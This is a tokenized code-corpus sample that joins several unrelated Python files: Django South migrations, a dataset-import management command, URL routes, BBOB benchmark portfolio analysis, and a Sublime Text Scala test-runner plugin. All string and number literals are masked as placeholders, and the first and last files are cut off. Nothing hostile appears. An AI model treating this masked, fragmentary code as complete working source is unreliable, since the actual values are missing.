'<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] <EOL> symmetrical = True </s>
<s> from optparse import make_option <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from data_set_manager . single_file_column_parser import SingleFileColumnParser <EOL> from data_set_manager . tasks import create_dataset <EOL> class Command ( BaseCommand ) : <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> type = '<STR_LIT:string>' , <EOL> help = '<STR_LIT>' <EOL> ) , <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> type = '<STR_LIT:string>' , <EOL> help = '<STR_LIT>' <EOL> ) , <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> type = '<STR_LIT:string>' , <EOL> help = '<STR_LIT>' <EOL> ) , <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> type = '<STR_LIT:string>' , <EOL> default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> type = '<STR_LIT:string>' , <EOL> default = None , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> """<STR_LIT>""" <EOL> def handle ( self , * args , ** options ) : <EOL> options [ '<STR_LIT>' ] = "<STR_LIT:0>" <EOL> options [ '<STR_LIT>' ] = "<STR_LIT:1>" <EOL> options [ '<STR_LIT>' ] = "<STR_LIT:2>" <EOL> options [ '<STR_LIT>' ] = "<STR_LIT:3>" <EOL> options [ '<STR_LIT>' ] = "<STR_LIT:4>" <EOL> options [ '<STR_LIT>' ] = "<STR_LIT:5>" <EOL> options [ '<STR_LIT>' ] = True <EOL> required = [ '<STR_LIT:username>' , '<STR_LIT:title>' , '<STR_LIT>' ] <EOL> for arg in required : <EOL> if not options [ arg ] : <EOL> raise CommandError ( '<STR_LIT>' % arg ) <EOL> parser = SingleFileColumnParser ( ) <EOL> parser . source_column_index = [ <EOL> int ( x . strip ( ) ) for x in options [ '<STR_LIT>' ] . split ( "<STR_LIT:U+002C>" ) ] <EOL> parser . column_index_separator = "<STR_LIT:/>" <EOL> parser . file_base_path = options [ '<STR_LIT>' ] <EOL> parser . file_column_index = int ( options [ '<STR_LIT>' ] ) <EOL> parser . auxiliary_file_column_index = int ( <EOL> options [ '<STR_LIT>' ] ) <EOL> parser . species_column_index = int ( options [ '<STR_LIT>' ] ) <EOL> parser . genome_build_column_index = int ( options [ '<STR_LIT>' ] ) <EOL> parser . annotation_column_index = int ( options [ '<STR_LIT>' ] ) <EOL> parser . file_permanent = options [ '<STR_LIT>' ] <EOL> investigation = parser . run ( options [ '<STR_LIT>' ] ) <EOL> investigation . title = options [ '<STR_LIT:title>' ] <EOL> investigation . save ( ) <EOL> create_dataset ( investigation . uuid , options [ '<STR_LIT:username>' ] , <EOL> dataset_title = options [ '<STR_LIT:title>' ] , slug = options [ '<STR_LIT>' ] , <EOL> public = options [ '<STR_LIT>' ] ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( unique = True , max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT:source>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:20> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:15> , blank = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> '''<STR_LIT>''' <EOL> from django . conf . urls import patterns , url <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) </s>
<s> from rec_layers import RecurrentLayer , RecurrentMultiLayer , RecurrentMultiLayerInp , RecurrentMultiLayerShortPath , RecurrentMultiLayerShortPathInp , RecurrentMultiLayerShortPathInpAll <EOL> from ff_layers import DropOp <EOL> from ff_layers import MultiLayer , LastState , UnaryOp , MaxPooling , Shift , BinaryOp , GaussianNoise <EOL> from ff_layers import maxpool , maxpool_ntimes , minpool , minpool_ntimes , last , last_ntimes , tanh , sigmoid , rectifier , hard_sigmoid , hard_tanh <EOL> from cost_layers import SoftmaxLayer , SigmoidLayer <EOL> from basic import Operator </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import numpy as np <EOL> import pickle , gzip <EOL> import re <EOL> import scipy . stats as ss <EOL> import sys <EOL> sys . path . append ( '<STR_LIT:.>' ) <EOL> import bbob_pproc as bb <EOL> import bbob_pproc . algportfolio <EOL> import bbob_pproc . bestalg <EOL> import bbob_pproc . readalign as ra <EOL> class PortfolioDataSets : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , algorithms = { } , strategies = { } , pickleFile = None ) : <EOL> """<STR_LIT>""" <EOL> if pickleFile is None : <EOL> self . algds = algorithms <EOL> self . stratds = strategies <EOL> self . _bestalg = None <EOL> self . _unifpf = None <EOL> else : <EOL> if pickleFile . find ( '<STR_LIT>' ) < <NUM_LIT:0> : <EOL> pickleFile += '<STR_LIT>' <EOL> with gzip . open ( pickleFile ) as f : <EOL> entry = pickle . load ( f ) <EOL> self . algds = entry . algds <EOL> self . stratds = entry . stratds <EOL> self . _bestalg = entry . _bestalg <EOL> self . _unifpf = entry . _unifpf <EOL> def add_algorithm ( self , name , ds ) : <EOL> """<STR_LIT>""" <EOL> self . algds [ name ] = ds <EOL> self . _bestalg = None <EOL> self . _unfipf = None <EOL> def add_strategy ( self , name , ds ) : <EOL> """<STR_LIT>""" <EOL> self . stratds [ name ] = ds <EOL> def bestalg ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> if self . _bestalg is None : <EOL> self . _bestalg = bb . bestalg . generate ( self . algds ) <EOL> return self . _bestalg [ dimfun ] if dimfun is not None else self . _bestalg <EOL> def oracle ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> ( dim , funcId ) = dimfun <EOL> bestfinalfunval = max ( np . median ( self . bestalg ( dimfun ) . bestfinalfunvals ) , <NUM_LIT> ) <EOL> algs = list ( self . algds_dimfunc ( dimfun ) ) <EOL> maxevals = np . max ( [ ds . maxevals for ( name , ds ) in algs ] ) <EOL> evals = np . array ( [ ds . detEvals ( [ bestfinalfunval ] ) for ( name , ds ) in algs ] ) <EOL> nanmask = np . isnan ( evals ) <EOL> medevals = [ maxevals ] * len ( algs ) <EOL> for i in range ( len ( algs ) ) : <EOL> algnanmask = ~ np . isnan ( evals ) [ i ] <EOL> if np . any ( algnanmask ) : <EOL> medevals [ i ] = np . median ( evals [ i , algnanmask ] ) <EOL> else : <EOL> medevals [ i ] = maxevals <EOL> nametarget = [ ( algs [ i ] [ <NUM_LIT:0> ] , medevals [ i ] ) for i in range ( len ( algs ) ) ] <EOL> ( name , target ) = min ( nametarget , key = lambda k : k [ <NUM_LIT:1> ] ) <EOL> return self . algds [ name ] . dictByDimFunc ( ) [ dim ] [ funcId ] [ <NUM_LIT:0> ] <EOL> def unifpf ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _unifpf is None : <EOL> self . _unifpf = bb . algportfolio . build ( self . algds ) <EOL> return self . _unifpf <EOL> def pickle ( self , pickleFile ) : <EOL> """<STR_LIT>""" <EOL> if pickleFile . find ( '<STR_LIT>' ) < <NUM_LIT:0> : <EOL> pickleFile += '<STR_LIT>' <EOL> with gzip . open ( pickleFile , '<STR_LIT:w>' ) as f : <EOL> pickle . dump ( self , f ) <EOL> def algds_dimfunc ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> ( dim , funcId ) = dimfun <EOL> for ( algname , dset ) in self . algds . iteritems ( ) : <EOL> yield ( algname , dset . dictByDimFunc ( ) [ dim ] [ funcId ] [ <NUM_LIT:0> ] ) <EOL> def stratds_dimfunc ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> ( dim , funcId ) = dimfun <EOL> for ( stratname , dset ) in self . stratds . iteritems ( ) : <EOL> yield ( stratname , dset . dictByDimFunc ( ) [ dim ] [ funcId ] [ <NUM_LIT:0> ] ) <EOL> def maxevals ( self , dimfun ) : <EOL> """<STR_LIT>""" <EOL> evals = [ np . median ( ds . maxevals ) for ( name , ds ) in self . algds_dimfunc ( dimfun ) ] <EOL> return max ( evals ) / dimfun [ <NUM_LIT:0> ] <EOL> def ranking ( self , dimfun , groupby , ftarget = <NUM_LIT:10> ** - <NUM_LIT:8> ) : <EOL> """<STR_LIT>""" <EOL> nameds = list ( itertools . chain ( self . algds_dimfunc ( dimfun ) , self . stratds_dimfunc ( dimfun ) ) ) <EOL> count = len ( nameds ) <EOL> fvset = [ ] <EOL> for ( name , ds ) in nameds : <EOL> budgets = ds . funvals [ : , <NUM_LIT:0> ] <EOL> f1vals = np . maximum ( groupby ( ds . funvals [ : , <NUM_LIT:1> : ] , axis = <NUM_LIT:1> ) , ftarget ) <EOL> fv = np . transpose ( np . vstack ( [ budgets , f1vals ] ) ) <EOL> fvset . append ( fv ) <EOL> fva = ra . alignArrayData ( ra . VArrayMultiReader ( fvset ) ) <EOL> budgets = fva [ : , <NUM_LIT:0> ] <EOL> values = fva [ : , <NUM_LIT:1> : ] . copy ( ) <EOL> firstconv = np . ones ( count ) * ( np . size ( budgets ) + <NUM_LIT:1> ) <EOL> for i in range ( count ) : <EOL> try : <EOL> firstconv [ i ] = np . nonzero ( values [ : , i ] == ftarget ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> continue <EOL> firstconvranks = ss . mstats . rankdata ( firstconv ) <EOL> for i in range ( count ) : <EOL> r = firstconvranks [ i ] <EOL> values [ firstconv [ i ] : , i ] = ftarget - ( <NUM_LIT:1> - r / count ) * ftarget <EOL> ranks = ss . mstats . rankdata ( values , axis = <NUM_LIT:1> ) <EOL> return np . transpose ( np . vstack ( [ budgets , ranks . T ] ) ) <EOL> def resolve_fid ( fid ) : <EOL> """<STR_LIT>""" <EOL> if fid . count ( '<STR_LIT:U+002C>' ) > <NUM_LIT:0> : <EOL> return [ int ( i ) for i in fid . split ( '<STR_LIT:U+002C>' ) ] <EOL> try : <EOL> return int ( fid ) <EOL> except ValueError : <EOL> pass <EOL> symbols = dict ( <EOL> all = set ( range ( <NUM_LIT:1> , <NUM_LIT> ) ) , <EOL> q = set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> ] ) , <EOL> single = set ( [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> many = set ( [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> volatile = set ( [ <NUM_LIT:6> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> steady = set ( [ <NUM_LIT:6> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> sudden = set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> CMAgood = set ( [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> CMAbad = set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> ] ) , <EOL> separ = set ( range ( <NUM_LIT:1> , <NUM_LIT:6> ) ) , <EOL> lcond = set ( range ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> hcond = set ( range ( <NUM_LIT:10> , <NUM_LIT:15> ) ) , <EOL> multi = set ( range ( <NUM_LIT:15> , <NUM_LIT:20> ) ) , <EOL> mult2 = set ( range ( <NUM_LIT:20> , <NUM_LIT> ) ) , <EOL> ) <EOL> fidset = set ( [ ] ) <EOL> for m in re . finditer ( r'<STR_LIT>' , fid ) : <EOL> if m . group ( <NUM_LIT:1> ) is None : <EOL> fidset = symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> elif m . group ( <NUM_LIT:1> ) == '<STR_LIT:+>' : <EOL> fidset |= symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> elif m . group ( <NUM_LIT:1> ) == '<STR_LIT::>' : <EOL> fidset &= symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> elif m . group ( <NUM_LIT:1> ) == '<STR_LIT:->' : <EOL> fidset -= symbols [ m . group ( <NUM_LIT:2> ) ] <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' + fid ) <EOL> return list ( fidset ) </s>
<s> import sublime , sublime_plugin , subprocess , thread , os , functools , glob , fnmatch <EOL> class JumpToTestCommand ( sublime_plugin . TextCommand ) : <EOL> def run ( self , edit ) : <EOL> current_file = self . view . file_name ( ) <EOL> self . base_dir = current_file . partition ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> if current_file . endswith ( "<STR_LIT>" ) : <EOL> target_file = current_file . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> target_file = current_file . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not os . path . exists ( target_file ) : <EOL> sublime . error_message ( "<STR_LIT>" + target_file ) <EOL> self . view . window ( ) . open_file ( target_file ) <EOL> class BaseScalaTestCommand ( sublime_plugin . TextCommand ) : <EOL> def load_config ( self ) : <EOL> s = sublime . load_settings ( "<STR_LIT>" ) <EOL> global SCALA ; SCALA = s . get ( "<STR_LIT>" ) <EOL> global useScalaTest ; useScalaTest = s . get ( "<STR_LIT>" ) == "<STR_LIT:true>" <EOL> def run ( self , edit ) : <EOL> self . load_config ( ) <EOL> self . show_tests_panel ( ) <EOL> self . base_dir = self . view . file_name ( ) . partition ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> runner = "<STR_LIT>" if useScalaTest else "<STR_LIT>" <EOL> scala_args = "<STR_LIT>" + runner + self . junit_args ( ) <EOL> command = wrap_in_cd ( self . base_dir , SCALA + "<STR_LIT:U+0020>" + scala_args ) <EOL> self . proc = subprocess . Popen ( command , shell = True , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> thread . start_new_thread ( self . read_stdout , ( ) ) <EOL> thread . start_new_thread ( self . read_stderr , ( ) ) 